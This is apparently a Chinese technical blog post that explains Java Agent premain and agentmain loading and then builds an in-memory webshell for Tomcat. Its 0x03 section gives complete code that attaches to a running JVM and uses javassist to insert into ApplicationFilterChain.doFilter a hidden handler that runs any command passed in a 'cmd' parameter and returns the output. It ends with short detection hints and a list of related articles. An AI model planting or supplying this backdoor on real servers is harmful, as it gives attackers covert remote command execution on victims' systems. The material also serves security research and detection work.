Java Agent 型内存马调试系列 (一)

已于 2022-10-17 11:44:34 修改
阅读量10w+ 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 内存马 Java 文章标签: java 网络安全 安全 jvm
于 2022-10-17 11:42:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/leeezp/article/details/127360325
本文介绍了Java Agent的premain和agentmain加载方式,展示了如何通过agentmain在JVM运行后动态修改类文件,重点讲解了如何利用agentmain进行内存马注入,并强调了条件获取和检测点的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 前言

在JDK1.5以后,引入了 java.lang.instrument 包,该包提供了检测 java 程序的 Api,比如用于监控、收集性能信息、诊断问题,通过 java.lang.instrument。

在 Instrumentation 中增加了名叫 transformer 的 Class 文件转换器,转换器可以改变二进制流的数据

Transformer 可以对未加载的类进行拦截,同时可对已加载的类进行重新拦截,所以根据这个特性我们能够在不影响正常编译的情况实现动态修改字节码,已加载或者未加载的类,包括类的属性、方法。

https://xz.aliyun.com/t/9450#toc-5

Java Agent 支持两种方式进行加载:

实现 premain 方法,在JVM init时进行加载 (该特性在 jdk 1.5 之后才有)

实现 agentmain 方法,在JVM启动后进行加载 (该特性在 jdk 1.6 之后才有)

What Are Java Agents and How to Profile With Them

优点:

It’s meant to allow you to change code, altering its behavior, without actually having to edit its source code file.

启动函数:

In short, a Java agent is nothing more than a normal Java class. The difference is that it has to follow some specific conventions. The first convention has to do with the entry point for the agent. The entry point consists of a method called “premain”, with the following signature:

public static void premain(String agentArgs, Instrumentation inst)

If the agent class doesn’t have the “premain” method with the signature above, it should have the following, alternative method:

public static void premain(String agentArgs)

As soon as the JVM initializes, it calls the premain method of every agent. After that, it calls the main method of the Java application as usual.

A java agent, in practice, is a special type of .jar file. As we’ve already mentioned, to create such an agent, we’ll have to use the Java Instrumentation API.

0x01 premain

新建一个项目 “agent”。

Hello.java

public class Hello {
    public static void main(String[] args) {
        System.out.println("Hello,main method");
    }
}

hello.mf

Manifest-Version: 1.0
Main-Class: Hello

DemoTest

import java.lang.instrument.Instrumentation;


public class DemoTest {
    public static void premain(String agentArgs, Instrumentation inst) throws Exception {
        System.out.println(agentArgs);
        for (int i = 0; i < 5; i++) {
            System.out.println("premain method is invoked!");
        }	      
    }
}

agent.mf

Manifest-Version: 1.0
Premain-Class: DemoTest

编译:

javac Hello.java
javac DemoTest.java

打jar包:

jar cvfm hello.jar hello.mf Hello.class
jar cvfm agent.jar agent.mf DemoTest.class

run(需要指定 javaagent参数,"="后面接传入的参数)

java -javaagent:agent.jar=Hello -jar hello.jar

输出className

DemoTest

import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.IllegalClassFormatException;
import java.lang.instrument.Instrumentation;
import java.security.ProtectionDomain;

public class DemoTest {
    public static void premain(String agentArgs, Instrumentation inst) throws Exception {
        System.out.println(agentArgs);
        for (int i = 0; i < 5; i++) {
            System.out.println("premain method is invoked!");
        }
        inst.addTransformer(new DefineTransformer(), true);
    }

    public static class DefineTransformer implements ClassFileTransformer {
        @Override
        public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
            System.out.println(className);
            return new byte[0];
        }
    }
}

重新编译执行:

报错了,原来是打jar包的时候有一个class没编译进去。

重新打jar包:

jar cvfm agent.jar agent.mf DemoTest.class DemoTest$DefineTransformer.class

运行:

java -javaagent:agent.jar=leeezp -jar hello.jar

又报错了,原来是要修改 DemoTest.java 的配置文件 agent.mf,Can-Retransform-Classes: true / Can-Redefine-Classes: true 添加到 agent.mf 中(注意最后空一行):

Manifest-Version: 1.0
Can-Retransform-Classes: true
Premain-Class: DemoTest

运行成功:

java -javaagent:agent.jar=leeezp -jar hello.jar

0x02 agentmain

很多时候我们内存马注入的情况都是处于 JVM 已运行了的情况,所以上面的方法就不是很有用,不过在 jdk 1.6 中实现了attach-on-demand(按需附着),我们可以使用 Attach API 动态加载 agent ,然而 Attach API 在 tool.jar 中,jvm 启动时是默认不加载该依赖的,需要我们在 classpath 中额外进行指定。

AgentMain.java

import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.IllegalClassFormatException;
import java.lang.instrument.Instrumentation;
import java.security.ProtectionDomain;

public class AgentMain {
    public static void agentmain(String agentArgs, Instrumentation ins) {
        ins.addTransformer(new DefineTransformer(),true);
    }
    public static class DefineTransformer implements ClassFileTransformer {
        @Override
        public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
            System.out.println(className);
            return new byte[0];
        }
    }
}

agentmain.mf

Manifest-Version: 1.0
Can-Retransform-Classes: true
Agent-Class: AgentMain

编译打包

javac AgentMain.java
jar cvfm AgentMain.jar agentmain.mf AgentMain.class AgentMain$DefineTransformer.class

至此我们的 AgentMain.jar 就成功生成了。

编写测试类 AgentMainDemo.java(在 https://blog.youkuaiyun.com/leeezp/article/details/126783259 中我已经介绍了如何新建一个简单的Springboot项目,所以不再赘述):

import com.sun.tools.attach.*;
import java.io.IOException;
import java.util.List;

public class AgentMainDemo {
    public static void main(String[] args) throws IOException, AttachNotSupportedException, AgentLoadException, AgentInitializationException {
        String path = "./AgentMain.jar";
        List<VirtualMachineDescriptor> list = VirtualMachine.list();
        for (VirtualMachineDescriptor v : list) {
            System.out.println(v.displayName());
            if (v.displayName().contains("AgentMainDemo")) {
                // 将 jvm 虚拟机的 pid 号传入 attach 来进行远程连接
                System.out.println(v.id());
                VirtualMachine vm = VirtualMachine.attach(v.id());
                System.out.println(vm);
                // 将我们的 agent.jar 发送给虚拟机
                vm.loadAgent(path);
                vm.detach();
            }
        }
    }
}

直接run AgentMainDemo.java:

报了个奇怪的错:

java.lang.UnsatisfiedLinkError: sun.tools.attach.LinuxVirtualMachine.isLinuxThreads()Z

原来是我的tools.jar 只有 LinuxAttachProvider

原因是我在windows机器上运行了linux版本的tools.jar。

换个windows版本的:

 

重新运行AgentMainDemo.java,又报错:

Error opening zip file or JAR manifest missing: ./AgentMain.jar

修改AgentMainDemo.java相对路径为绝对路径:

import com.sun.tools.attach.*;	
import java.io.IOException;
import java.util.List;

public class AgentMainDemo {
    public static void main(String[] args) throws IOException, AttachNotSupportedException, AgentLoadException, AgentInitializationException {
        String path = "C:\\Users\\Administrator\\Desktop\\Java-Shellcode-Loader-master\\untitled5\\src\\AgentMain.jar";  // 相对路径报错
        List<VirtualMachineDescriptor> list = VirtualMachine.list();
        for (VirtualMachineDescriptor v : list) {
            System.out.println(v.displayName());
            if (v.displayName().contains("AgentMainDemo")) {
                // 将 jvm 虚拟机的 pid 号传入 attach 来进行远程连接
                System.out.println(v.id());
                VirtualMachine vm = VirtualMachine.attach(v.id());
                System.out.println(vm);
                // 将我们的 agent.jar 发送给虚拟机
                vm.loadAgent(path);
                vm.detach();
            }
        }
    }
}

再次运行:

java/lang/instrument/ClassFileTransformer.java类的transform方法,要么返回新的class字节码,要么返回null

我修改了 AgentMain.java,将return new byte[0]改成return null不报java/lang/IndexOutOfBoundsException错误了:

import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.IllegalClassFormatException;
import java.lang.instrument.Instrumentation;
import java.security.ProtectionDomain;

public class AgentMain {
    public static void agentmain(String agentArgs, Instrumentation ins) {
        ins.addTransformer(new DefineTransformer(),true);
    }
    public static class DefineTransformer implements ClassFileTransformer {
        @Override
        public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
            System.out.println(className);
            //return new byte[0];
            return null;
        }
    }
}

在实际使用中,因为tools.jar 并不会在 JVM 启动的时候默认加载,所以这里利用 URLClassloader 来加载我们的 tools.jar

所以呢我又修改了代码 TestAgentMain.java:

import java.io.File;

public class TestAgentMain {
    public static void main(String[] args) {
        try {
            System.out.println(System.getProperty("java.home")); //E:\jdk1.8\jre
            java.io.File toolsPath = new java.io.File(System.getProperty("java.home").replace("jre", "lib") + File.separator + "tools.jar");
            //System.out.println(toolsPath);//E:\jdk1.8\lib\tools.jar
            //System.out.println(toolsPath.toURI().toURL().getClass()); //java.net.URL
            java.net.URL url = toolsPath.toURI().toURL(); //file:/E:/jdk1.8/lib/tools.jar
            java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{url});

            Class<?> MyVirtualMachine = classLoader.loadClass("com.sun.tools.attach.VirtualMachine");
            Class<?> MyVirtualMachineDescriptor = classLoader.loadClass("com.sun.tools.attach.VirtualMachineDescriptor");
            java.lang.reflect.Method listMethod = MyVirtualMachine.getDeclaredMethod("list", null);
            java.util.List<Object> list = (java.util.List<Object>) listMethod.invoke(MyVirtualMachine, null);
            System.out.println("Running JVM Start..");
            System.out.println(list.size());
            for (int i = 0; i < list.size(); i++) {
                Object o = list.get(i);
                java.lang.reflect.Method displayName = MyVirtualMachineDescriptor.getDeclaredMethod("displayName", null);
                String name = (String) displayName.invoke(o, null);
                if (name.contains("com.example.demo.DemoApplication")) {
                    java.lang.reflect.Method getId = MyVirtualMachineDescriptor.getDeclaredMethod("id", null);
                    String id = (String) getId.invoke(o, null);
                    System.out.println(id);
                    java.lang.reflect.Method attach = MyVirtualMachine.getDeclaredMethod("attach", new Class[]{java.lang.String.class});
                    //System.out.println(attach);
                    java.lang.Object vm = attach.invoke(o, new Object[]{id});
                    System.out.println(vm);
                    java.lang.reflect.Method loadAgent = MyVirtualMachine.getDeclaredMethod("loadAgent", new Class[]{java.lang.String.class});
                    java.lang.String path = "C:\\Users\\Administrator\\Desktop\\Java-Shellcode-Loader-master\\untitled5\\src\\AgentMain.jar";
                    System.out.println("------------");
                    loadAgent.invoke(vm, new Object[]{path});
                    java.lang.reflect.Method detach = MyVirtualMachine.getDeclaredMethod("detach", null);
                    detach.invoke(vm, null);
                    break;
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

其中这一行 if (name.contains("com.example.demo.DemoApplication")) { 要根据实际你要注入的进程名替换。

0x03 内存马注入

由于实际环境中我们通常遇到的都是已经启动着的,所以 premain 那种方法不合适内存马注入,所以我们这里利用 agentmain 方法来尝试注入我们的内存马

利用 insertBefore ,将其插入到前面,从而减少对原程序的功能破坏:

AgentMain.java

import javassist.*;	
import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.IllegalClassFormatException;
import java.lang.instrument.Instrumentation;
import java.security.ProtectionDomain;


public class AgentMain {
    /*
    public static void premain(String agentArgs, Instrumentation inst) {
        agentmain(agentArgs, inst);
    }
    */

    public static final String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    public static void agentmain(String agentArgs, Instrumentation ins) {
        ins.addTransformer(new DefineTransformer(), true);
        Class[] classes = ins.getAllLoadedClasses();
        for (Class clas : classes) {
            if (clas.getName().equals(ClassName)) {
                try {
                    ins.retransformClasses(new Class[]{clas});    //retransformClasses
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        }
    }

    public static class DefineTransformer implements ClassFileTransformer {
        @Override
        public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
            className = className.replace("/", ".");
            if (className.equals(ClassName)) {
                System.out.println("Find the Inject Class: " + ClassName);
                ClassPool pool = ClassPool.getDefault();
                try {
                    CtClass c = pool.getCtClass(className);
                    CtMethod m = c.getDeclaredMethod("doFilter");
                    // 如果服务端没有 javassist.jar 会是NULL 不会打印值
                    //System.out.println(c); // for debug // print : javassist.CtClassType@697a3904[public final class org.apache.catalina.core.ApplicationFilterChain implements javax.servlet.FilterChain...
                    //System.out.println(m); // for debug // print : javassist.CtMethod@8fc543ac[public doFilter (Ljavax/servlet/ServletRequest;Ljavax/servlet/ServletResponse;)V]

                    m.insertBefore("javax.servlet.http.HttpServletRequest req =  request;\n" +
                            "javax.servlet.http.HttpServletResponse res = response;\n" +
                            "java.lang.String cmd = request.getParameter(\"cmd\");\n" +
                            "if (cmd != null){\n" +
                            "java.io.InputStream in = null;\n" +
                            "java.lang.String osname = java.lang.System.getProperty(\"os.name\").toLowerCase();\n" +
                            "if (osname.contains(\"win\")) {" +
                            "    try {\n" +
                            "         in = Runtime.getRuntime().exec(new String[]{\"cmd\", \"/c\", cmd}).getInputStream();\n" +
                            "    }catch (Exception e){}\n" +
                            "} else {\n" +
                            "    try {\n" +
                            "        in = Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd}).getInputStream();\n" +
                            "    }catch (Exception e){}\n" +
                            "}\n" +
                            "java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(in));\n" +
                            "try {\n" +
                            // 方法一: 完美!!! 通过close() 使输出一遍
                            "java.lang.String line;\n" +
                            "java.io.PrintWriter writer = res.getWriter();\n" +
                            "while ((line = reader.readLine()) != null) {\n" +
                            "writer.write(line+\"\\r\\n\");}\n" +
                            "writer.flush();\n" +
                            "writer.close();\n" +  // 输出流关闭操作放到循环外层

                            /*
                             方法二:
                             会输出5遍,具体原因可能与 ApplicationFilterChain 默认的几条链有关,没做深入研究...
                            //"java.io.PrintWriter writer=res.getWriter();\n" +
                            //"writer.print(reader.lines().collect(java.util.stream.Collectors.joining(\"\\n\")));\n" +
                             */

                            /*
                            方法三:
                            sevlet里面可以,在agent.jar里注入这种写法不行,原因未知
                            //"java.io.PrintWriter writer=res.getWriter();\n" +
                            //"writer.write(reader.lines().collect(java.util.stream.Collectors.joining(\"\\n\")));\n" +   //writer.write() 报错,  javassist.CannotCompileException: [source error] write(java.lang.Object) not found in java.io.PrintWriter
                             */

                            /*
                            方法四:
                            兼容性不好,中文不友好  java.io.CharConversionException: Not an ISO 8859-1 character: [�]
                            //"((java.io.PrintWriter)res.getWriter()).write(reader.lines().collect(java.util.stream.Collectors.joining(\"\\n\")));\n" +
                            //"res.getOutputStream().print(reader.lines().collect(java.util.stream.Collectors.joining(\"\\n\")).toString());\n" +   // javassist.CannotCompileException: [source error] print(java.lang.Object) not found in javax.servlet.ServletOutputStream
                            //"res.getOutputStream().flush();\n" +
                            //"res.getOutputStream().close();\n" +

                             */
                            "} catch (java.io.IOException e2) {\n" +
                            "   e2.printStackTrace();\n" +
                            "    }\n" +
                            "}");

                    byte[] bytes = c.toBytecode();
                    c.detach();
                    return bytes;
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
            return new byte[0];
        }
    }
}

编译打jar包:

javac -encoding utf-8 -classpath ./javassist-3.28.0-GA.jar AgentMain.java
jar cvfm AgentMain.jar agentmain.mf AgentMain.class AgentMain$DefineTransformer.class

编译并执行测试程序:

javac -encoding utf-8 ./TestAgentMain.java
java TestAgentMain

0x04 利用条件

1.需要先获取jvm进程名,然后选择要注入的进程

2.服务端环境需要导入 javassist.jar

0x05 检测点

1.服务器日志异常,普通的hacker 虽然可以执行命令,但是因为代码不完善或操作失误会引起服务器日志抛出异常,成为一个溯源点。

2.检测内存里的class类名

3....

Java Agent 内存调试系列 ()——反序列化注入agent
leeezp的博客
10-28 30万+
实战中通过反序列化环境步到位注入内存,相比于之前介绍的agent或filter内存需要上传文件到服务器,反序列化的好处是真正的无文件,只需要发个包。
Java Agent调试
qq_26761587的博客
12-16 8295
最近在学习Java Agent,记录下如何调试、写Agent1、编写Java类,并包含如下两个方法中的任个: public static void premain(String agentArgs, Instrumentation inst); //【1】 public static void premain(String agentArgs); //【2】 其中
[Java安全]—Agent内存
Sentiment的博客
08-17 4202
JVM中运行中,类是通过classLoader加载.class文件进行生成的。在类加载.class文件生成对应的类对象之前,我们可以通过修改.class文件内容,达到修改类的目的。而在 jdk 1.5之后引入了 java.lang.instrument 包,通过 java.lang.instrument 提供的对字节码进行操作的系列api,而使用这些api开发出的程序就可以称之为java agentagent内存就是利用上述特性修改特定的类或者方法,从而实现恶意方法的注入。Ja...
IDEA通过agentlib实现远程调试Java项目(SpringBoot)
热门推荐
一恍过去
03-14 1万+
IDEA通过agentlib实现远程调试Java项目(SpringBoot)
Java Agent 调试Java agent debug
汪小哥
02-02 7995
Java Agent 调试agent debug 、简介 Java agent 是在另外Java 应用(“目标”应用)启动之前要执行的 Java 程序,这样 agent 就有机会修改目标应用或者应用所运行的环境。修改环境的时候做到对于项目中的代码没有入侵性,不需要修改老项目代码即可实现想要的能力,比如常见的skywoking,就是通过这样的方式实现的。比如这篇文章 通过修改字节码实现J...
Java Agent 内存调试系列 ()——反序列化注入agent_ysoserial 注入
2401_84968612的博客
05-17 507
自我介绍下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Java Agent 内存调试系列 ()——反序列化注入agent_ysoserial 注入(1)
2401_84968582的博客
05-17 457
自我介绍下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Java服务安全内存实践资料合集(33份).zip
01-14
论如何优雅的注入Java Agent内存.pdf 浅析JSP内存.pdf 探索FilterTomcat内存的免杀.pdf 以初学者角度调试filter内存.pdf Agent内存的自动分析与查杀.pdf Executor内存的实现.pdf Executor内存的...
javaAgent内存踩坑记录
qq_43698139的博客
01-07 762
笔者是按照该文章的javaAgent模块搭建的demo项目。但是在搭建过程中由于对java以及IDEA的些操作不是很熟悉,导致踩了些坑,特此mark下。
java项目实现热更源码-javaagent
01-06
2. **指定Agent参数**:在Java应用启动时,通过`-javaagent`参数指定Agent的路径和可选参数。例如:`-javaagent:/path/to/your/agent.jar=param1=value1,param2=value2`。 3. **操作类字节码**:Java Agent接收到...
学习Java agent 内存(看不懂别关闭,直接喷!!!)
一剑开天门!的博客
12-23 3654
java agentJava 程序,可以通过在 Java 虚拟机(JVM)启动时提供参数来加载和运行。它可以通过 java.lang.instrument 包提供的 Java 标准接口进行代码插桩,从而在 Java 应用程序的类加载和运行期间改变 Java 字节码。而java agent内存就是利用这个特性产生。
java agent内存学习
Shanfenglan's blog
11-12 2152
文章目录1. 什么是java agent补充:些重要的类ClassFileTransformerVirtualMachineCtMethod2. 利用premain函数实现java agent2.1 执行逻辑2.2 利用javaagent修改加载到jvm前被拦截的类3. 利用agentmain实现javaagent3.1 执行逻辑3.2 参考代码1. 实现连接指定jvm进程的代码:2. 实现agentmain4. 利用agentmain实现内存4.1 修改spring boot中的Filter实现内存
Java Agent + javassist 调试demo
Mr_rain的专栏
04-13 1635
java agent是基于java instrument实现,instrument的底层实现依赖于JVMTI,也就是JVM Tool Interface。 文章目录代码准备java代码如下各module的 pom.xmlagent 接入的两种方式1、启动时接入2、运行时接入Idea调试本地module调试本地lib调试采用jdwp进行调试参考 代码准备 本次实验在工程中新增了3个module,4个类 Module Class Describe learn-main Handle 代理实验类
Java Agent内存
google20的博客
12-25 1081
java Agent内存
JAVA安全Java Agent内存
最新发布
2401_83799022的博客
02-10 1477
Java Agent种特殊的Java程序,它允许开发者在Java虚拟机(JVM)启动时或运行期间通过java.lang.instrument包提供的Java标准接口进行代码插桩,从而实现在Java应用程序类加载和运行期间动态修改已加载或者未加载的类,包括类的属性、方法等,而Java Agent内存的实现便是利用了这特性使其动态修改特定类的特定方法将我们的恶意方法添加进去java.lang.instrument.Instrumentation提供了用于监测运行在JVM中的Java API。
构造agent内存(内存系列篇十三)
Jinmindong
02-22 794
前面我们对JAVA中的Agent技术进行了简单的学习,学习前面的Agent技术是为了给这篇Agent内存的实现做出铺垫,接下来我们就来看看Agent内存的实现。这是内存系列篇的第十三篇了。这个内存算是我搞得比较久的内存了,主要是中间出现了好多好多的问题,还好,时间没有白费,还是个脚印的将所有错误debug解决了,不得不说debug是个好东西。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。
Java Agent如何在IDEA里调试
寂寞的博客
05-27 7399
agent开发必备调试技巧:如何在IDEA里debug agent代码.
Java Agent 内存攻防
顶峰
02-03 1337
在 jdk 1.5 之后引入了 java.lang.instrument 包,该包提供了检测 java 程序的Api,用于监控、收集性能信息、诊断问题等。通过 java.lang.instrument 实现的工具我们称之为 Java AgentJavaAgent 能够在不影响正常编译的情况下来修改字节码,即动态修改已加载或者未加载的类,包括类的属性、方法等。premain方法,在JVM启动前加载。agentmain方法,在JVM启动后加载。
JAVA探针机制—Agent
weixin_42454225的博客
05-26 4276
JAVA探针机制—Agentagent机制首次出现在JDK5版本,在JDK6版本得到升级并且正式被官方定义为agent原理。 首先要明确JavaAgentJVM层面的插件,他可以利用JDK中的Instrumenttation类,实现对类字节码文件的修改。 而Agent在功能上的实现有两种情况: 在main方法执行前,调用premain方法。 在main方法执行后,监控JVM虚拟机的同时,调用agentmain方法。 目前市场上很多日志、热部署、性能监控等等插件功能,都是基于探针中agent
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值